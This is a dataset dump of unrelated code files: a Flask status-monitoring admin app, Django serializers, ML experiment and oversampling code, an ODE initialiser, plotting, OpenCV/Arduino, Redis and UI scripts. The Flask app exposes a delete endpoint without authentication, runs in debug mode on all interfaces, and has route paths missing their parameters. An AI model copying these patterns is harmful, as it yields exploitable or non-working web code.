= datetime.now() - time\n formattime = \"\"\n\n if hasattr(delta, 'hours'):\n formattime += \"{} h\".format(delta.hours)\n if hasattr(delta, 'minutes'):\n formattime += \"{} m\".format(delta.minutes)\n if hasattr(delta, 'seconds'):\n formattime += \"{} s\".format(delta.seconds)\n print(formattime)\n return formattime\n\ndef authenticate_user():\n try:\n user = request_to_dict(['email', 'password'])\n\n if not user['email'] or not user['password']:\n raise Exception('Invalid form.')\n find_user = database.find_user_by_email(user['email'])\n\n if not find_user or not argon2.verify(user['password'], find_user[1]):\n raise Exception('Invalid crendentials')\n else:\n print(\"Authenticated user: {}\".format(find_user[0]))\n session['logged_user'] = find_user[0]\n return redirect(url_for('admin'))\n except Exception as e:\n return render_template('login.html', message=e)\n\n@app.route('/admin/delete/website/', methods=[\"GET\"])\ndef delete_website(website_id):\n try:\n find_website = database.fetch_one_website(website_id)\n if not find_website[0]:\n raise Exception('Invalid website id.')\n database.delete_website(find_website[0])\n return redirect(url_for('admin'))\n except Exception as e:\n abort(404)\n\n@app.route('/admin/create/website', methods=['GET', 'POST'])\ndef create_website():\n if not session.get('logged_user'):\n return redirect(url_for('connection'))\n if request.method == 'GET':\n return render_template('create_website.html')\n try:\n website = request_to_dict(['url', 'title'])\n if not website['url']:\n raise Exception('Invalid form.')\n if not validate_url(website['url']):\n raise Exception('Invalid url.')\n database.create_website(website)\n return redirect(url_for('admin'))\n except Exception as e:\n return render_template('create_website.html', message=e.args[0])\n\n@app.route('/admin/websites//delete/status')\ndef delete_status(website_id):\n if not session.get('logged_user'):\n return redirect(url_for('connection'))\n try:\n database.delete_status(website_id)\n return redirect(url_for('show_status', website_id=website_id))\n except Exception as e:\n abort(404)\n\n@app.route('/admin/websites/')\ndef show_status(website_id):\n if not session.get('logged_user'):\n return redirect(url_for('connection'))\n try:\n website = database.fetch_one_website(website_id)\n status = database.fetch_status_by_website(website_id)\n return render_template('show_status.html', website=website, status=status)\n except Exception as e:\n abort(404)\n\n@app.route('/disconnect')\ndef disconnect():\n if session['logged_user']:\n session.clear()\n return redirect(url_for('index'))\n\n@app.route('/')\ndef index():\n return render_template('index.html')\n\n@app.route('/admin')\ndef admin():\n try:\n user = session['logged_user']\n websites = database.fetch_all_websites()\n return render_template('admin.html', websites=websites)\n except Exception as e:\n return redirect(url_for('connection'))\n\n@app.route('/login', methods=['GET', 'POST'])\ndef connection():\n if request.method == 'GET':\n return render_template('login.html')\n else:\n return authenticate_user()\n\nif __name__ == '__main__':\n status = Status(name=\"Status Watchers\")\n status.start()\n app.run(threaded=True, debug=True, use_reloader=False, host='0.0.0.0')\n\n","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":4870,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"471452875","text":"from rest_framework import serializers\nfrom .models import BasicProduct, SoldBasicProduct\nfrom ..customAuth.serializers import SafeUserDataSerializer\n\n\nclass BasicProductSerializer(serializers.ModelSerializer):\n\n class Meta:\n model = BasicProduct\n fields = ('id', 'title', 'slug', 'active', 'price')\n\n extra_kwargs = {\n 'id': {'read_only': True},\n 'slug': {'read_only': True},\n }\n\n\nclass SoldBasicProductSerializer(serializers.ModelSerializer):\n url = serializers.HyperlinkedIdentityField(\n lookup_field='id',\n view_name=\"basic-product:sold-basic-product-detail\",\n read_only=True\n )\n\n basic_product = serializers.HyperlinkedRelatedField(\n read_only=True,\n lookup_field='slug',\n view_name='basic-product:basic-product-detail'\n )\n\n sold_to = serializers.SerializerMethodField()\n\n class Meta:\n model = SoldBasicProduct\n fields = [\n 'id', 'url', 'basic_product', 'price', 'sold_to',\n ]\n\n def get_sold_to(self, obj):\n return SafeUserDataSerializer(obj.sold_to).data\n","sub_path":"code/sNeeds/apps/basicProducts/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":1116,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"584092120","text":"# -*- coding: utf-8 -*-\n\"\"\"\n.. module:: size_of_data_set_incremental_experiment\n :platform: Unix, Windows\n :synopsis: This module contains an abstract class used to conduct \n the first sub experiment of the preliminary experiment \n of the thesis. The experiment consists mainly of trying \n to find the optimal number of bug reports that should \n be used to train a classifier. In the context of the \n first sub experiment, all the folds, except the oldest \n one, are used to evaluate the performance of the \n classifier (cf. Master's Thesis). \n\n.. moduleauthor:: Daniel Artchounin \n\n\n\"\"\"\n\nimport numpy as np\nimport abc\nimport os\nimport inspect\n\ncurrent_dir = os.path.dirname(os.path.abspath( \\\ninspect.getfile(inspect.currentframe())))\nos.sys.path.insert(0, current_dir)\nfrom sub_exp_of_preliminary_exp_launcher \\\nimport SubExpOfPreliminaryExpLauncher\n \nclass SubExp1OfPreliminaryExpLauncher(SubExpOfPreliminaryExpLauncher):\n \n @abc.abstractmethod\n def __init__(self, data_set_file, developers_dict_file, \\\n developers_list_file):\n super().__init__(data_set_file, developers_dict_file, \\\n developers_list_file)\n self._type = \"incremental\"\n \n def _yield_indices_for_learning_curve(self, K=33):\n super()._yield_indices_for_learning_curve(K)\n number_of_instances = self._X.shape[0]\n indices = super()._custom_linspace(0, number_of_instances, K+1)\n for i in range(len(indices)-2, 0, -1):\n for j in range(i):\n yield np.asarray(range(indices[j], indices[i])), \\\n np.asarray(range(indices[i], indices[i+1]))\n \n def _generate_list_indices_for_learning_curve(self, K=33):\n super()._generate_list_indices_for_learning_curve(K)\n number_of_instances = self._X.shape[0]\n indices = super()._custom_linspace(0, number_of_instances, K+1)\n train_indices = []\n test_indices = []\n for i in range(len(indices)-2, 0, -1):\n for j in range(i):\n train_indices.append(list(range(indices[j], indices[i])))\n test_indices.append(list(range(indices[i], indices[i+1])))\n return train_indices, test_indices \n \n def plot_or_save_learning_curve(self, K=33, save_file=True):\n super().plot_or_save_learning_curve(K, save_file)","sub_path":"src/preliminary_experiment/sub_exp_1_of_preliminary_exp_launcher.py","file_name":"sub_exp_1_of_preliminary_exp_launcher.py","file_ext":"py","file_size_in_byte":2488,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"257849216","text":"\"\"\"Runge-Kutta initialisation.\"\"\"\n\n\nfrom typing import Optional\n\nimport numpy as np\nimport scipy.integrate as sci\n\nfrom probnum import filtsmooth, problems, randprocs, randvars\nfrom probnum.diffeq.odefilter.initialization_routines import _initialization_routine\nfrom probnum.typing import FloatArgType\n\n\nclass RungeKuttaInitialization(_initialization_routine.InitializationRoutine):\n r\"\"\"Initialize a probabilistic ODE solver by fitting the prior process to a few steps of an approximate ODE solution computed with Scipy's Runge-Kutta methods.\n\n Parameters\n ----------\n dt\n Maximum step-size to use for computing the approximate ODE solution. The smaller, the more accurate, but also, the smaller, the less stable.\n The best value here depends on the ODE problem, and probably the chosen method. Optional. Default is ``1e-2``.\n method\n Which solver to use. This is communicated as a string that is compatible with ``scipy.integrate.solve_ivp(..., method=method)``.\n Optional. Default is `DOP853`.\n\n Examples\n --------\n\n >>> import numpy as np\n >>> from probnum.randvars import Normal\n >>> from probnum.problems.zoo.diffeq import vanderpol\n >>> from probnum.randprocs.markov.integrator import IntegratedWienerProcess\n\n Compute the initial values of the van-der-Pol problem as follows.\n First, we set up the ODE problem and the prior process.\n\n >>> ivp = vanderpol()\n >>> print(ivp.y0)\n [2. 0.]\n >>> prior_process = IntegratedWienerProcess(initarg=ivp.t0, num_derivatives=3, wiener_process_dimension=2)\n\n Next, we call the initialization routine.\n\n >>> rk_init = RungeKuttaInitialization()\n >>> improved_initrv = rk_init(ivp=ivp, prior_process=prior_process)\n >>> print(prior_process.transition.proj2coord(0) @ improved_initrv.mean)\n [2. 0.]\n >>> print(np.round(improved_initrv.mean, 1))\n [ 2. 0. -2. 58.2 0. -2. 60. -1745.7]\n >>> print(np.round(np.log10(improved_initrv.std), 1))\n [-13.8 -11.3 -9. -1.5 -13.8 -11.3 -9. -1.5]\n \"\"\"\n\n def __init__(\n self, dt: Optional[FloatArgType] = 1e-2, method: Optional[str] = \"DOP853\"\n ):\n self.dt = dt\n self.method = method\n super().__init__(is_exact=False, requires_jax=False)\n\n def __call__(\n self,\n ivp: problems.InitialValueProblem,\n prior_process: randprocs.markov.MarkovProcess,\n ) -> randvars.RandomVariable:\n \"\"\"Compute the initial distribution.\n\n For Runge-Kutta initialization, it goes as follows:\n\n 1. The ODE integration problem is set up on the interval ``[t0, t0 + (2*order+1)*h0]``\n and solved with a call to ``scipy.integrate.solve_ivp``. The solver is uses adaptive steps with ``atol=rtol=1e-12``,\n but is forced to pass through the\n events ``(t0, t0+h0, t0 + 2*h0, ..., t0 + (2*order+1)*h0)``.\n The result is a vector of time points and states, with at least ``(2*order+1)``.\n Potentially, the adaptive steps selected many more steps, but because of the events, fewer steps cannot have happened.\n\n 2. A prescribed prior is fitted to the first ``(2*order+1)`` (t, y) pairs of the solution. ``order`` is the order of the prior.\n\n 3. The value of the resulting posterior at time ``t=t0`` is an estimate of the state and all its derivatives.\n The resulting marginal standard deviations estimate the error. This random variable is returned.\n\n Parameters\n ----------\n ivp\n Initial value problem.\n prior_process\n Prior Gauss-Markov process.\n\n Returns\n -------\n Normal\n Estimated (improved) initial random variable. Compatible with the specified prior.\n \"\"\"\n f, y0, t0, df = ivp.f, ivp.y0, ivp.t0, ivp.df\n y0 = np.asarray(y0)\n ode_dim = y0.shape[0] if y0.ndim > 0 else 1\n order = prior_process.transition.num_derivatives\n\n # order + 1 would suffice in theory, 2*order + 1 is for good measure\n # (the \"+1\" is a safety factor for order=1)\n num_steps = 2 * order + 1\n t_eval = np.arange(t0, t0 + (num_steps + 1) * self.dt, self.dt)\n sol = sci.solve_ivp(\n f,\n (t0, t0 + (num_steps + 1) * self.dt),\n y0=y0,\n atol=1e-12,\n rtol=1e-12,\n t_eval=t_eval,\n method=self.method,\n )\n\n # Measurement model for SciPy observations\n proj_to_y = prior_process.transition.proj2coord(coord=0)\n zeros_shift = np.zeros(ode_dim)\n zeros_cov = np.zeros((ode_dim, ode_dim))\n measmod_scipy = randprocs.markov.discrete.LTIGaussian(\n proj_to_y,\n zeros_shift,\n zeros_cov,\n proc_noise_cov_cholesky=zeros_cov,\n forward_implementation=\"sqrt\",\n backward_implementation=\"sqrt\",\n )\n\n # Measurement model for initial condition observations\n proj_to_dy = prior_process.transition.proj2coord(coord=1)\n if df is not None and order > 1:\n proj_to_ddy = prior_process.transition.proj2coord(coord=2)\n projmat_initial_conditions = np.vstack((proj_to_y, proj_to_dy, proj_to_ddy))\n initial_data = np.hstack((y0, f(t0, y0), df(t0, y0) @ f(t0, y0)))\n else:\n projmat_initial_conditions = np.vstack((proj_to_y, proj_to_dy))\n initial_data = np.hstack((y0, f(t0, y0)))\n zeros_shift = np.zeros(len(projmat_initial_conditions))\n zeros_cov = np.zeros(\n (len(projmat_initial_conditions), len(projmat_initial_conditions))\n )\n measmod_initcond = randprocs.markov.discrete.LTIGaussian(\n projmat_initial_conditions,\n zeros_shift,\n zeros_cov,\n proc_noise_cov_cholesky=zeros_cov,\n forward_implementation=\"sqrt\",\n backward_implementation=\"sqrt\",\n )\n\n # Create regression problem and measurement model list\n ts = sol.t[:num_steps]\n ys = list(sol.y[:, :num_steps].T)\n ys[0] = initial_data\n measmod_list = [measmod_initcond] + [measmod_scipy] * (len(ts) - 1)\n regression_problem = problems.TimeSeriesRegressionProblem(\n observations=ys, locations=ts, measurement_models=measmod_list\n )\n\n # Infer the solution\n kalman = filtsmooth.gaussian.Kalman(prior_process)\n out, _ = kalman.filtsmooth(regression_problem)\n estimated_initrv = out.states[0]\n return estimated_initrv\n","sub_path":"src/probnum/diffeq/odefilter/initialization_routines/_runge_kutta.py","file_name":"_runge_kutta.py","file_ext":"py","file_size_in_byte":6561,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"606611295","text":"import collections\n\nimport numpy as np\nimport pandas as pd\n\nfrom typing import List, Callable, Union, Sequence\n\nMutator = Callable[[pd.DataFrame], pd.DataFrame]\n\n\ndef mutate_baselines(baseline_datas: List[pd.DataFrame],\n baselines_mutators: List[Mutator],\n inplace_mutations: Union[bool, Sequence[bool]] = True) -> List[pd.DataFrame]:\n \"\"\"\n Mutates the inputted baselines using the mutators.\n A mutation can be either inplace or create a new mutated version of each baselines in addition to the original\n This is done using the sequence inplace_mutations - for each mutator if the boolean in the same position within\n the sequence is True the mutation will be inplace, and if False the mutation will create a copy.\n If inplace_mutations is a single boolean, it will be treated as if all mutators have that value\n\n :param baseline_datas: the baselines to mutate\n :param baselines_mutators: the mutators to use - each will be used an all baselines\n :param inplace_mutations: marks which mutators will be inplace and which will create copies\n :return: a list of all mutated baselines (can contain both inplace and new mutations)\n \"\"\"\n if isinstance(inplace_mutations, collections.Sequence):\n assert len(inplace_mutations) == len(baselines_mutators), \"inplace specifications must match number of mutators\"\n else:\n inplace_mutations: List[bool] = [inplace_mutations] * len(baselines_mutators)\n\n mutated_baselines = [baseline_data.copy() for baseline_data in baseline_datas]\n\n for mutator, is_inplace_mutation in zip(baselines_mutators, inplace_mutations):\n if is_inplace_mutation:\n mutated_baselines = [mutator(baseline_data) for baseline_data in mutated_baselines]\n else:\n mutated_baselines += [mutator(baseline_data) for baseline_data in mutated_baselines]\n\n return mutated_baselines\n\n\ndef mult_baseline_sizes_mutation(mult: int, baseline_data: pd.DataFrame) -> pd.DataFrame:\n \"\"\"\n multiplies the total amount of bytes and packets by a constant integer\n :param mult: the multitude by which the sizes will be multiplied\n :param baseline_data: the baseline to be mutated\n :return: a copy of the data with the sizes multiplied by the constant\n \"\"\"\n mutated_baseline = baseline_data.copy()\n mutated_baseline[['total_bytes', 'num_packets']] *= mult\n return mutated_baseline\n\n\ndef sizes_mult_mutator(mult: int) -> Mutator:\n \"\"\"\n creates a mutation method of `mult_baseline_sizes_mutation` with the inputted value\n :param mult: the constant the `mult_baseline_sizes_mutation` will use\n :return: the mutation method\n \"\"\"\n return lambda baseline_data: mult_baseline_sizes_mutation(mult, baseline_data)\n\n\ndef shuffle_protocols_mutation(baseline_data: pd.DataFrame) -> pd.DataFrame:\n \"\"\"\n shuffle the indices of a baseline randomly\n :param baseline_data: the baseline to mutate\n :return: a copy of the baseline with the indices (protocols) shuffled\n \"\"\"\n shuffled_indices: list = baseline_data.index.to_numpy().tolist()\n np.random.shuffle(shuffled_indices)\n\n return pd.DataFrame(baseline_data.to_numpy(), columns=baseline_data.columns, index=shuffled_indices)\n\n\ndef switch_2_protocols_mutation(baseline_data: pd.DataFrame) -> pd.DataFrame:\n \"\"\"\n switches the indices of 2 randomly chosen rows in the baseline\n :param baseline_data: the baseline to mutate\n :return: a copy of the baseline with 2 rows' indices being switched\n \"\"\"\n indices: list = baseline_data.index.to_numpy().tolist()\n\n idx_to_switch = np.random.choice(np.arange(len(indices)), size=2, replace=False)\n indices[idx_to_switch[0]], indices[idx_to_switch[1]] = indices[idx_to_switch[1]], indices[idx_to_switch[0]]\n\n return pd.DataFrame(baseline_data.to_numpy(), columns=baseline_data.columns, index=indices)\n\n\ndef change_values_by_x_percent_mutation(baseline_data: pd.DataFrame, mutation_percentage: float,\n features_to_change: List[str] = None,\n protocols_to_change: List[str] = None) -> pd.DataFrame:\n \"\"\"\n randomly changes the features of a baseline randomly by at most mutation_percentage,\n only in the protocols and features specified.\n Each value will that will be changed will be multiplied by a random number in the range (1-X, 1+X),\n When X is the mutation percentage\n :param baseline_data: the baseline to mutate\n :param mutation_percentage: the max percentage by which the mutated values can change from the original\n :param features_to_change: the features to be changed randomly. by default all features are changed\n :param protocols_to_change: the protocols to be changed randomly. by default all protocols are changed\n :return: the baseline randomly changed\n \"\"\"\n if features_to_change is None:\n features_to_change = baseline_data.columns.to_numpy().tolist()\n\n if protocols_to_change is None:\n protocols_to_change = baseline_data.index.to_numpy().tolist()\n\n rand_vals = pd.DataFrame(\n np.random.uniform(1 - mutation_percentage, 1 + mutation_percentage, size=baseline_data.to_numpy().shape),\n columns=baseline_data.columns, index=baseline_data.index)\n\n # set features and protocols that should not be changed to be multiplied by 1\n rand_vals[list(set(rand_vals.columns).difference(features_to_change))] = 1.0\n rand_vals.loc[list(set(rand_vals.index).difference(protocols_to_change))] = 1.0\n\n mutated_data = baseline_data * rand_vals\n for col in mutated_data.columns:\n mutated_data[col] = mutated_data[col].astype(baseline_data[col].dtype)\n\n return mutated_data\n\n\ndef rand_by_x_percent_mutator(mutation_percentage: float, features_to_change: List[str] = None,\n protocols_to_change: List[str] = None) -> Mutator:\n \"\"\"\n Returns a `change_values_by_x_percent_mutation` with the inputted percentage, features and protocols\n :param mutation_percentage: the max percentage by which the mutated values can change from the original\n :param features_to_change: the features to be changed randomly. by default all features are changed\n :param protocols_to_change: the protocols to be changed randomly. by default all protocols are changed\n :return: the mutation method\n \"\"\"\n return lambda baseline_data: change_values_by_x_percent_mutation(baseline_data, mutation_percentage,\n features_to_change, protocols_to_change)\n\n\n__all__ = [\n 'Mutator',\n 'mutate_baselines',\n 'mult_baseline_sizes_mutation',\n 'sizes_mult_mutator',\n 'shuffle_protocols_mutation',\n 'switch_2_protocols_mutation',\n 'change_values_by_x_percent_mutation',\n 'rand_by_x_percent_mutator',\n]\n","sub_path":"ReinforcementLearning/mutators.py","file_name":"mutators.py","file_ext":"py","file_size_in_byte":6861,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"257053137","text":"import numpy as np\nimport matplotlib.pyplot as plt\n\ninput = open(\"throughput_ins.csv\", 'r', encoding='utf-8')\n\nkey = []\nva = []\nfb_va_ss = []\nfb_std_ss = []\nfb_va = []\nfb_std = []\nbloom = []\n\nfor line in input.readlines():\n if line.find('occ') != -1: continue\n cur_line = line.strip()\n row = [0, 0, 0, 0, 0, 0, 0]\n row[0], row[1], row[2], row[3], row[4], row[5], row[6] = map(float, cur_line.split(',')[0:-1])\n key.append(row[0])\n va.append(row[1])\n bloom.append(row[2])\n fb_va_ss.append(row[3])\n fb_std_ss.append(row[4])\n fb_va.append(row[5])\n fb_std.append(row[6])\n\nkey = np.array(key)\nva = np.array(va)\nfb_va_ss = np.array(fb_va_ss)\nfb_std_ss = np.array(fb_std_ss)\nfb_va = np.array(fb_va)\nfb_std = np.array(fb_std)\nbloom = np.array(bloom)\n\nprint(fb_std_ss)\n\nplt.figure(figsize = (12, 9))\nplt.plot(key, fb_std, marker = \"+\", label = \"CF\", markersize = 12)\nplt.plot(key, fb_va, marker = \"*\", label = \"VF\", markersize = 12)\nplt.plot(key, bloom, marker = \"s\", label = \"BF\", markersize = 12)\nplt.plot(key, fb_std_ss, marker = \"v\", label = \"CF-ss (Padding)\", markersize = 12)\nplt.plot(key, fb_va_ss, marker = \"^\", label = \"VF-ss (Padding)\", markersize = 12)\nplt.plot(key, va, marker = \"o\", label = \"VF-ss (No Padding)\", markersize = 12)\n\nplt.legend(loc = \"best\", fontsize = 28, ncol = 2)\nplt.xlabel(\"Occupancy\", fontsize = 28)\n#plt.ylabel(\"Bits per Item\")\nplt.ylabel(\"Insert Throughput (MOPS)\", fontsize = 28)\n\n#t = key[-1]\n#xtick = np.linspace(float(key[0]), float(t), 8)\n#print(xtick)\nplt.xlim((-0.03, 1))\nplt.xticks(np.linspace(0, 1, 5), fontsize = 28)\nplt.yticks(np.linspace(0, 25, 6), fontsize = 28)\n\n#ytick = np.linspace(float(sscf12[0]), float(sscf12[-1]), 10)\n#print(ytick)\n#plt.ylim((sscf12[0], sscf12[-1]))\n#plt.yticks(ytick)\n\nplt.savefig(\"ins-throughput.png\")\n#plt.show()\n\nexit()\n\nplt.semilogx(w, bf, lw = 1.5, linestyle = \"--\", label = \"Bloom Filter\")\n#plt.semilogx(w, vf, lw = 1.5, label = \"Vacuum Filter\")\n#plt.semilogx(w, cf_best, lw = 1.5, linestyle = \"-.\", label = \"Cuckoo Filter Best Case\")\nplt.semilogx(w, vf, lw = 1.5, color = \"black\", label = \"Vacuum Filter / CF Best Case\")\nplt.semilogx(w, cf_avg, lw = 1.5, linestyle = \"-\", label = \"Cuckoo Filter Average Case\")\nplt.semilogx(w, cf_worst, lw = 1.5, label = \"Cuckoo Filter Worst Case\")\nplt.semilogx(w, low_bound, lw = 1, linestyle = \":\", color = \"black\", label = \"Lower Bound\")\nplt.xlabel(\"False Postive Rate\")\nplt.ylabel(\"Bits per Item\")\nplt.legend(loc = \"upper right\")\nplt.show()\n\nexit()\n\n#print(abs_time)\nprint(velocity)\n#print(height)\nplt.subplot(4, 1, 1)\nplt.plot(abs_time, a_z)\nplt.ylabel('Acceleration : m/s^2')\n\nplt.subplot(4, 1, 2)\nplt.plot(abs_time, velocity)\nplt.ylabel('Velocity : m/s')\n\nplt.subplot(4, 1, 3)\nplt.plot(abs_time, height)\nplt.ylabel('Height : m')\n\nplt.subplot(4, 1, 4)\nplt.plot(abs_time, h)\nplt.ylabel('Height_M : m')\n\nplt.xlabel('time : s')\nplt.show()\n\n","sub_path":"Figures/gen-ins.py","file_name":"gen-ins.py","file_ext":"py","file_size_in_byte":2881,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"2735808","text":"import numpy as np\nimport cv2\nimport math\nimport serial\narduino = serial.Serial('COM6', 9600)\n# arduino = serial.Serial('COM5', 9600)\nchup =0;\ncap = cv2.VideoCapture(0)\ncap.set(3,640)\ncap.set(4,480)\ntong=0\ndata=0\ndef pythonreply(para):\n msg = str(para)\n arduino.write(bytes(msg))\n print(msg)\nwhile True:\n length=0\n ret, img = cap.read()\n data = arduino.read()\n data = str(data)\n key = cv2.waitKey(10) \n ret, img = cap.read()\n if img is None:\n break\n gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n edges = cv2.Canny(gray, 200, 220)\n lines = cv2.HoughLinesP(edges, 1, math.pi/1, 10, 10, 2, 350);\n\n dot1 = (lines[0][0][0],lines[0][0][1])\n dot2 = (lines[0][0][2],lines[0][0][3])\n cv2.line(img, dot1, dot2, (0,0,255), 3)\n cv2.imshow(\"output\", img)\n # print (length)\n key = cv2.waitKey(10)\n \n if key == 27:\n break\n if data==\"c\":\n gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n edges = cv2.Canny(gray, 100, 120)\n lines = cv2.HoughLinesP(edges, 1, math.pi/1, 20, None, 2, 480);\n\n dot1 = (lines[0][0][0],lines[0][0][1])\n dot2 = (lines[0][0][2],lines[0][0][3])\n cv2.line(img, dot1, dot2, (0,0,255), 3)\n cv2.imshow(\"output\", img)\n length = lines[0][0][1] - lines[0][0][3] \n print(length)\n if(length<180 or length>220):\n print(\"khong dat\")\n pythonreply(0)\n data=\"kc\"\n elif(length>=180 and length<=220):\n print(\"dat\")\n pythonreply(1)\n data=\"kc\" \n length=0 \ncv2.destroyAllWindows() \ncv2.VideoCapture(0).release()","sub_path":"ImageProcessing.py","file_name":"ImageProcessing.py","file_ext":"py","file_size_in_byte":1637,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"324819168","text":"from tkinter import *\n\nclass Window(Frame):\n def __init__(self, master = None):\n Frame.__init__(self, master = None)\n self.master = master\n self.init_window()\n\n def init_window(self):\n self.master.title(\"Main Menu\")\n self.pack(fill=BOTH, expand = 1)\n\n logoutButton = Button(self, text = \"Log Out\")\n logoutButton.place(x = 740, y = 10)\n\n \n\n\nroot = Tk()\nroot.geometry(\"800x450\")\napp = Window(root)\nroot.mainloop()","sub_path":"UI/studentMenu.py","file_name":"studentMenu.py","file_ext":"py","file_size_in_byte":473,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"419175266","text":"import settings\nimport redis\nimport csv\nimport sys\nimport os\n\ndef ProcessCSVFile(r, csvin):\n\twith open(csvin, 'rt', encoding='utf-8') as csvfile:\n\t\tspamreader = csv.reader(csvfile, delimiter=',', quoting=csv.QUOTE_NONE, )\n\n\t\t# Ignore Row Header\n\t\tnext(spamreader)\n\n\t\tfor row in spamreader:\n\t\t\tProcessCustomerRow(r, row)\n\ndef ProcessCustomerRow(r, row):\n\t# CSV Header\n\t# ID,Company,Contact,ContactTitle,Address,City,Region,PostalCode,Country,Phone,Fax\n\n\t_key = \"customer-country:\" + row[8]\n\t_id = row[0]\n\tr.sadd(_key, _id)\n\nif __name__ == \"__main__\":\n\tprint(\"Reading Customers...\")\n\t_csvPath = os.path.dirname(os.path.dirname(__file__))\n\t_customersCSV = os.path.join(_csvPath, \"CSVs\", \"customers.csv\")\n\n\t# Connect to Redis\n\tr = redis.Redis(host=settings.redisSettings[\"host\"], port=settings.redisSettings[\"port\"], password=settings.redisSettings[\"password\"], db=settings.redisSettings[\"database\"])\n\n\tProcessCSVFile(r, _customersCSV)\n\n\tprint(\"Reading Customers Completed\")\n","sub_path":"Redis-Python/07_Create_Customers_Country_Key.py","file_name":"07_Create_Customers_Country_Key.py","file_ext":"py","file_size_in_byte":971,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"323747464","text":"import numpy as np\nfrom sklearn import neighbors\nimport pandas as pd\nfrom sklearn.model_selection import train_test_split\nimport operator\nfrom statistics import mean\n\n\ndef adasyn(xtrain, ytrain, target_column, class_to_boost, complex_model, nominal, n_neighbors, boost_coef):\n # (xtrain, ytrain, beta, threshold, target_column, boost_coef, K=5)\n # we introduce the parameter class weight\n # it says how many times we want to increase the population of each class\n # df, X_train, y_train, class_weight, \"target\"\n train_dataset = pd.concat([xtrain, ytrain], axis=1, sort=False)\n # print(len(train_dataset))\n # print(train_dataset)\n if class_to_boost == 1:\n train_dataset = train_dataset.sort_values(by=target_column, ascending=False)\n m = int(sum(ytrain))\n # print(m)\n\n else:\n train_dataset = train_dataset.sort_values(by=target_column, ascending=True)\n m1 = int(sum(ytrain))\n # print(m1)\n m = len(ytrain) - m1\n # print(m)\n\n clf = neighbors.KNeighborsClassifier(n_neighbors=n_neighbors)\n clf.fit(xtrain, ytrain)\n\n # Step 2a, if the minority data set is below the maximum tolerated threshold, generate data.\n # Beta is the desired balance level parameter. Beta > 1 means u want more of the imbalanced type, vice versa.\n G = boost_coef * m - m\n\n # Step 2b, find the K nearest neighbours of each minority class example in euclidean distance.\n # Find the ratio ri = majority_class in neighbourhood / K\n Ri = []\n Minority_per_xi = []\n for i in range(m):\n xi = xtrain.iloc[i, :]\n # print(xi)\n # Returns indices of the closest neighbours, and return it as a list\n neighbours = clf.kneighbors([xi], n_neighbors=n_neighbors, return_distance=False)[0]\n # print(neighbours)\n # Skip classifying itself as one of its own neighbours\n # neighbours = neighbours[1:]\n\n # Count how many belongs to the majority class\n count = 0\n for value in neighbours:\n if value > m:\n count += 1\n\n # Find all the minority examples\n minority = []\n for value in neighbours:\n # Shifted back 1 because indices start at 0\n if value <= m - 1:\n minority.append(value)\n # print(minority)\n # print(count)\n if len(minority) >= 2:\n Ri.append(count / n_neighbors)\n Minority_per_xi.append(minority)\n elif len(minority) == 1:\n Ri.append(1/n_neighbors)\n Minority_per_xi.append(minority)\n else:\n Ri.append(0)\n Minority_per_xi.append(minority)\n\n # Step 2c, normalize ri's so their sum equals to 1\n Rhat_i = []\n for ri in Ri:\n rhat_i = ri / sum(Ri)\n Rhat_i.append(rhat_i)\n\n # Step 2d, calculate the number of synthetic data examples that will be generated for each minority example\n Gi = []\n for rhat_i in Rhat_i:\n gi = round(rhat_i * G)\n Gi.append(int(gi))\n # print(max(Gi))\n\n l = []\n for group in Minority_per_xi:\n l.append(len(group))\n\n # print(min(l))\n # # Step 2e, generate synthetic examples\n number_of_added_data = 0\n syn_data = []\n\n for i in range(m):\n most_common_nominal = {}\n xi = xtrain.iloc[i, :]\n if len(nominal) >= 1:\n for feature in nominal:\n count = 0\n sum_nominal = 0\n # print(feature)\n for sample in Minority_per_xi[i]:\n # print(sample)\n x_sample = xtrain.iloc[sample, :]\n # print(x_sample)\n # print(type(x_sample))\n #feature_value = x_sample[feature]\n sum_nominal += x_sample[feature]\n\n #if feature_value in count:\n # count[feature_value] += 1\n #else:\n # count[feature_value] = 1\n most_common_nominal[feature] = round(sum_nominal/len(Minority_per_xi[i]))\n #key_max = max(count.items(), key=operator.itemgetter(1))[0]\n #most_common_nominal[feature] = key_max\n # print(\"xi\", xi)\n for j in range(Gi[i]):\n # If the minority list is not empty\n if Minority_per_xi[i]:\n index = np.random.choice(Minority_per_xi[i])\n xzi = xtrain.iloc[index, :]\n si = xi + (xzi - xi) * np.random.uniform(0, 1)\n if len(nominal) >= 1:\n for feature in nominal:\n si[feature] = most_common_nominal[feature]\n syn_data.append(si)\n number_of_added_data += 1\n\n # Build the data matrix\n new_y = []\n for i in range(len(syn_data)):\n new_y.append(int(complex_model.predict([syn_data[i]])))\n\n new_y_df = pd.DataFrame({target_column: new_y})\n new_df = pd.DataFrame(syn_data)\n new_df.reset_index(drop=True, inplace=True)\n new_df = pd.concat([new_df, new_y_df], axis=1)\n\n return new_df\n","sub_path":"adasyn_optimal.py","file_name":"adasyn_optimal.py","file_ext":"py","file_size_in_byte":5089,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"451203732","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\n# apt-get install python-tk\n#from Tkinter import *\nimport os, time\nimport weakref\nimport npyscreen\nimport curses\nimport select, os\nfrom npyscreen import MultiLine\n\nclass ActionControllerSearch(npyscreen.ActionControllerSimple):\n def create(self):\n self.add_action('^/.*', self.set_search, True)\n\n def set_search(self, command_line, widget_proxy, live):\n self.parent.value.set_filter(command_line[1:])\n self.parent.wMain.values = 